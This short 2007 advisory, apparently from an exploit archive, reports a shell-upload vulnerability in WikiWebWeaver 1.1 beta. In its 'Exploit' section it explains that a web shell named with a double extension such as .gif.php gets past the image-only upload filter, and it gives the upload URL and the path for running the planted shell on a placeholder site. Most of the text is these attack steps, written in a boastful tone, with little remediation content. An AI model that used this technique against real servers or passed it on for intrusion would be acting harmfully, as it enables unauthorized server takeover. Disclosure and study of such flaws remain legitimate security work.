('binary' encoding is not supported, stored as-is)
Yollubunlar.Org
--------------------------------------------------------------------------------
Title : WikiWebWeaver 1.1 beta Upload Shell Upload Vulnerability
--------------------------------------------------------------------------------
#Author: Yollubunlar.Org
#cont_at_ct: yollubunlar_at_hotmail.com
--------------------------------------------------------------------------------
Affected software description :
--------------------------------------------------------------------------------
Application : WikiWebWeaver 1.1
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Exploit:
WikiWebWeaver 1.0 beta 2 Script Have Upload part and you can upload only gif,jpeg lol :D
but you can upload gif.php or psd.php
http://www.site.com/wiki_path/index.php?upload
we upload a .gif.php or others than our shell go
http://www.site.com/wiki_path/data/documents/ourshell.gif.php :)
--------------------------------------------------------------------------------
greets:Yollubunlar.Org
--------------------------------------------------------------------------------
--------------------------------- [Yollubunlar.Org ] --------------------------------------
Received on Aug 01 2007
Intro
